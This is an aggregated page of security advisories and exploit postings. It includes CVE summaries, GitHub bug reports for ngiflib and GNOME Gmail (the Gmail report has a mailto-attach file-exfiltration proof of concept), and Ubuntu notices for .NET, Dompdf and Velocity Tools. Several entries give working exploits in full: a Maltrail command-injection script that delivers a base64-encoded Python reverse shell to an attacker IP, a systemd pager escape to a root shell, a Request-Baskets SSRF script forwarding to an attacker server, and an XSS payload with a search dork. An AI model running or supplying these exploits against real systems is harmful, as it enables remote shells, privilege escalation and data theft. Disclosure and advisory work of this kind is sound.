An issue was discovered in GetByte function in miniupnp ngiflib version 0.4, allows local attackers to cause a denial of service (DoS) via crafted .gif file (infinite loop).

I used the command line gif2tga --outbase /dev/null path\_to\_file to run gif2tga and got a timeout.  
The program didn't return or repsond.  
The system is ubuntu 16.04.6 amd-64, source commit id is: 0245fd4  
compiled by gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12)

debug informations is:  
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1  
Copyright (C) 2016 Free Software Foundation, Inc.  
License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html  
This is free software: you are free to change and redistribute it.  
There is NO WARRANTY, to the extent permitted by law. Type "show copying"  
and "show warranty" for details.  
This GDB was configured as "x86\_64-linux-gnu".  
Type "show configuration" for configuration details.  
For bug reporting instructions, please see:  
http://www.gnu.org/software/gdb/bugs/.  
Find the GDB manual and other documentation resources online at:  
http://www.gnu.org/software/gdb/documentation/.  
For help, type "help".  
Type "apropos word" to search for commands related to "word"...  
Reading symbols from gif2tga...done.  
(gdb) r --outbase /dev/null /home/yang/test.gif  
Starting program: /home/yang/MyProject/remote\_test/target\_src/ngiflib/gif2tga --outbase /dev/null /home/yang/test.gif  
^C  
Program received signal SIGINT, Interrupt.  
0x00007ffff7b04320 in \_\_read\_nocancel () at ../sysdeps/unix/syscall-template.S:84  
84 ../sysdeps/unix/syscall-template.S: No such file or directory.  
(gdb) step  
\_IO\_new\_file\_underflow (fp=0x605070) at fileops.c:594  
594 fileops.c: No such file or directory.  
(gdb) step  
597 in fileops.c  
(gdb)  
596 in fileops.c  
(gdb)  
597 in fileops.c  
(gdb)  
607 in fileops.c  
(gdb)  
613 in fileops.c  
(gdb)  
608 in fileops.c  
(gdb)  
613 in fileops.c  
(gdb)  
\_\_GI\_\_IO\_default\_uflow (fp=0x605070) at genops.c:414  
414 genops.c: No such file or directory.  
(gdb)  
417 in genops.c  
(gdb)  
\_IO\_getc (fp=0x605070) at getc.c:37  
37 getc.c: No such file or directory.  
(gdb)  
\_IO\_acquire\_lock\_fct (p=) at libioP.h:866  
866 libioP.h: No such file or directory.  
(gdb)  
\_IO\_getc (fp=0x605070) at getc.c:37  
37 getc.c: No such file or directory.  
(gdb)  
\_IO\_acquire\_lock\_fct (p=) at libioP.h:867  
867 libioP.h: No such file or directory.  
(gdb)

The poc is attached below.

  
Thank you.

CVE-2020-24221: I found a large or infinite loop in ngiflib · Issue #17 · miniupnp/ngiflib

An issue was discovered in attach parameter in GNOME Gmail version 2.5.4, allows remote attackers to gain sensitive information via crafted "mailto" link.

Following the email conversation with David I am raising this security issue as agreed (or some might say a feature/expected behavior)

**Summary**  
By using the "mailto?attach=..." parameter, a website can make GNOME Gmail attach local files to an email message without showing a warning to the user, additionally when user writes an email they can't see that there is an attachment on some systems. Please see test.gif for a demonstration.

To summarize it is an analog of CVE-2020-11879 in GNOME Evolution KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089), and Pegasus Mail. https://twitter.com/jensvoid/status/1295357952480751616 Jens originally found this type of issue in email clients. As Jens wrote in the bugzilla report 613425 I quote: "_This is arguable a dangerous feature because it allows an attacker to exfiltrate arbitrary files on disk (and also email from the victim's IMAP account), if the victim sends an email based on attacker controlled mailto input and misses the attachment being added._"

**How to reproduce**

1.  Have GNOME Gmail client installed on Ubuntu and choose GNOME GMail and Chrome as default browsers (I tested on Ubuntu 20.04 and 18.04.4 with latest stable Chrome)
2.  Copy Tux.png to /tmp directory
3.  Open test.html
4.  Click "Send email"
5.  In the GNOME Gmail fill the "To" and "Subject" fields
6.  Click send

  
test.html

    <html>
    <body>
    <p>POC test</p>
    <p><a href="mailto:alikhan@uzakov.io?attach=/tmp/Tux.png">Send email</a></p>
    </body>
    </html>
    

Tux.png https://en.wikipedia.org/wiki/File:Tux.png  
**Additional information**  
On Ubuntu 18.04.4 with Chrome version 83.0.4103.116 attachment isn't shown, as you can see in demo above  
On Ubuntu 20.04 with the latest stable Chrome attachment is shown

CVE-2020-24904: Security issue · Issue #84 · davesteele/gnome-gmail

Cross Site Scripting (XSS) vulnerability in Query Report feature in Zoho ManageEngine Password Manager Pro version 11001, allows remote attackers to execute arbitrary code and steal cookies via crafted JavaScript payload.

CVE-2020-27449: Release Notes - ManageEngine Password Manager Pro

Ubuntu Security Notice 6278-2 - USN-6278-1 fixed several vulnerabilities in .NET. This update provides the corresponding updates for Ubuntu 22.04 LTS. It was discovered that .NET did properly handle the execution of certain commands. An attacker could possibly use this issue to achieve remote code execution.

==========================================================================  
Ubuntu Security Notice USN-6278-2  
August 10, 2023

dotnet6, dotnet7 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in .NET.

Software Description:  
- dotnet6: dotNET CLI tools and runtime  
- dotnet7: dotNET CLI tools and runtime

Details:

USN-6278-1 fixed several vulnerabilities in .NET. This update  
provides the corresponding updates for Ubuntu 22.04 LTS.

Original advisory details:

   It was discovered that .NET did properly handle the execution of  
   certain commands. An attacker could possibly use this issue to  
   achieve remote code execution. (CVE-2023-35390)

   Benoit Foucher discovered that .NET did not properly implement the  
   QUIC stream limit in HTTP/3. An attacker could possibly use this  
   issue to cause a denial of service. (CVE-2023-38178)

   It was discovered that .NET did not properly handle the disconnection  
   of potentially malicious clients interfacing with a Kestrel server. An  
   attacker could possibly use this issue to cause a denial of service.  
   (CVE-2023-38180)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
    aspnetcore-runtime-6.0           6.0.121-0ubuntu1~22.04.1  
    aspnetcore-runtime-7.0           7.0.110-0ubuntu1~22.04.1  
    dotnet-host 6.0.121-0ubuntu1~22.04.1  
    dotnet-host-7.0                       7.0.110-0ubuntu1~22.04.1  
    dotnet-hostfxr-6.0                   6.0.121-0ubuntu1~22.04.1  
    dotnet-hostfxr-7.0                   7.0.110-0ubuntu1~22.04.1  
    dotnet-runtime-6.0                  6.0.121-0ubuntu1~22.04.1  
    dotnet-runtime-7.0                  7.0.110-0ubuntu1~22.04.1  
    dotnet-sdk-6.0                        6.0.121-0ubuntu1~22.04.1  
    dotnet-sdk-7.0                        7.0.110-0ubuntu1~22.04.1  
    dotnet6 6.0.121-0ubuntu1~22.04.1  
    dotnet7 7.0.110-0ubuntu1~22.04.1

In general, a standard system update will make all the necessary changes.

References:  
    https://ubuntu.com/security/notices/USN-6278-2  
    https://ubuntu.com/security/notices/USN-6278-1  
    CVE-2023-35390, CVE-2023-38178, CVE-2023-38180

Package Information:  
https://launchpad.net/ubuntu/+source/dotnet6/6.0.121-0ubuntu1~22.04.1  
https://launchpad.net/ubuntu/+source/dotnet7/7.0.110-0ubuntu1~22.04.1

Ubuntu Security Notice USN-6278-2

Ubuntu Security Notice 6277-2 - USN-6277-1 fixed vulnerabilities in Dompdf. This update provides the corresponding updates for Ubuntu 22.04 LTS. It was discovered that Dompdf was not properly validating untrusted input when processing HTML content under certain circumstances. An attacker could possibly use this issue to expose sensitive information or execute arbitrary code. This issue only affected Ubuntu 16.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-6277-2  
August 10, 2023

php-dompdf vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in Dompdf.

Software Description:  
- php-dompdf: HTML to PDF converter

Details:

USN-6277-1 fixed vulnerabilities in Dompdf. This update provides the  
corresponding updates for Ubuntu 22.04 LTS.

Original advisory details:

  It was discovered that Dompdf was not properly validating untrusted input when  
  processing HTML content under certain circumstances. An attacker could  
  possibly use this issue to expose sensitive information or execute arbitrary  
  code. This issue only affected Ubuntu 16.04 LTS.  
  (CVE-2014-5011, CVE-2014-5012, CVE-2014-5013)

  It was discovered that Dompdf was not properly validating processed HTML  
  content that referenced PHAR files, which could result in the deserialization  
  of untrusted data. An attacker could possibly use this issue to execute  
  arbitrary code. (CVE-2021-3838)

  It was discovered that Dompdf was not properly validating processed HTML  
  content that referenced both a remote base and a local file, which could  
  result in the bypass of a chroot check. An attacker could possibly use this  
  issue to expose sensitive information. (CVE-2022-2400)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   php-dompdf                      0.6.2+dfsg-3.1ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6277-2  
   https://ubuntu.com/security/notices/USN-6277-1  
   CVE-2021-3838, CVE-2022-2400

Package Information:  
https://launchpad.net/ubuntu/+source/php-dompdf/0.6.2+dfsg-3.1ubuntu0.1

Ubuntu Security Notice USN-6277-2

Ubuntu Security Notice 6282-1 - Jackson Henry discovered that Velocity Tools incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6282-1  
August 10, 2023

velocity-tools vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Velocity Tools could be made to run arbitrary code if it opened a specially  
crafted file.

Software Description:  
- velocity-tools: A subproject of the Apache Velocity project

Details:

Jackson Henry discovered that Velocity Tools incorrectly handled certain  
inputs. If a user or an automated system were tricked into opening a specially  
crafted input file, a remote attacker could possibly use this issue to execute  
arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   libvelocity-tools-java          2.0-7ubuntu0.20.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   libvelocity-tools-java          2.0-7ubuntu0.18.04.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libvelocity-tools-java          2.0-4ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6282-1  
   CVE-2020-13959

Package Information:  
   https://launchpad.net/ubuntu/+source/velocity-tools/2.0-7ubuntu0.20.04.1

Ubuntu Security Notice USN-6282-1

systemd version 246 suffers from a local root privilege escalation vulnerability.

    # Exploit Title: systemd 246 - Local Privilege Escalation# Exploit Author: Iyaad Luqman K (init_6)# Application: systemd 246# Tested on: Ubuntu 22.04# CVE: CVE-2023-26604systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user. This vulnerability allows a local attacker to gain root privileges.## Proof Of Concept:1. Run the systemctl command which can be run as root user.sudo /usr/bin/systemctl status any_service2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands.3. Type in `!/bin/sh` in the pager to spawn a shell as root user.

systemd 246 Local Root Privilege Escalation

Maltrail version 0.53 suffers from an unauthenticated remote code execution vulnerability.

    # Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution (RCE)# Exploit Author: Iyaad Luqman K (init_6)# Application: Maltrail v0.53# Tested on: Ubuntu 22.04# CVE: CVE-2023-27163# PoCimport sys;import os;import base64;def main():  listening_IP = None  listening_PORT = None  target_URL = None  if len(sys.argv) != 4:    print("Error. Needs listening IP, PORT and target URL.")    return(-1)    listening_IP = sys.argv[1]  listening_PORT = sys.argv[2]  target_URL = sys.argv[3] + "/login"  print("Running exploit on " + str(target_URL))  curl_cmd(listening_IP, listening_PORT, target_URL)def curl_cmd(my_ip, my_port, target_url):  payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''  encoded_payload = base64.b64encode(payload.encode()).decode()  # encode the payload in Base64  command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"  os.system(command)if __name__ == "__main__":  main()

Maltrail 0.53 Remote Code Execution

Request-Baskets version 1.2.1 suffers from a server-side request forgery vulnerability.

    # Exploit Title: Request-Baskets v1.2.1 - Server-side request forgery (SSRF)# Exploit Author: Iyaad Luqman K (init_6)# Application: Request-Baskets v1.2.1# Tested on: Ubuntu 22.04# CVE: CVE-2023-27163# PoC#!/bin/bashif [ "$#" -lt 2 ] || [ "$1" = "-h" ] || [ "$1" = "--help" ]; then    help="Usage: exploit.sh <URL> <TARGET>\n\n";    help+="Arguments:\n" \    help+=" URL            main path (/) of the server (eg. http://127.0.0.1:5000/)\n";    help+=" TARGET";    echo -e "$help";    exit 1;fiURL=$1ATTACKER_SERVER=$2if [ "${URL: -1}" != "/" ]; then    URL="$URL/";fi;BASKET_NAME=$(LC_ALL=C tr -dc 'a-z' </dev/urandom | head -c "6");API_URL="$URL""api/baskets/$BASKET_NAME";PAYLOAD="{\"forward_url\": \"$ATTACKER_SERVER\",\"proxy_response\": true,\"insecure_tls\": false,\"expand_path\": true,\"capacity\": 250}";echo "> Creating the \"$BASKET_NAME\" proxy basket...";if ! response=$(curl -s -X POST -H 'Content-Type: application/json' -d "$PAYLOAD" "$API_URL"); then    echo "> FATAL: Could not properly request $API_URL. Is the server online?";    exit 1;fi;BASKET_URL="$URL$BASKET_NAME";echo "> Basket created!";echo "> Accessing $BASKET_URL now makes the server request to $ATTACKER_SERVER.";if ! jq --help 1>/dev/null; then    echo "> Response body (Authorization): $response";else    echo "> Authorization: $(echo "$response" | jq -r ".token")";fi;exit 0;

Request-Baskets 1.2.1 Server-Side Request Forgery

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

Posted Aug 11, 2023

Authored by indoushka

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss

SHA-256 | f72dfd55d23408ab5429974dee598db6c2f5f4c1ad279051decdd75964ab240b

Download | Favorite | View

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,933)
*   Arbitrary (16,196)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,861)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,770)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,671)
*   Local (14,448)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,145)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,765)
*   Root (3,581)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,366)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,770)
*   Web (9,663)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,932)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,812)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,428)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,808)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,573)
*   Other

Tag

#ubuntu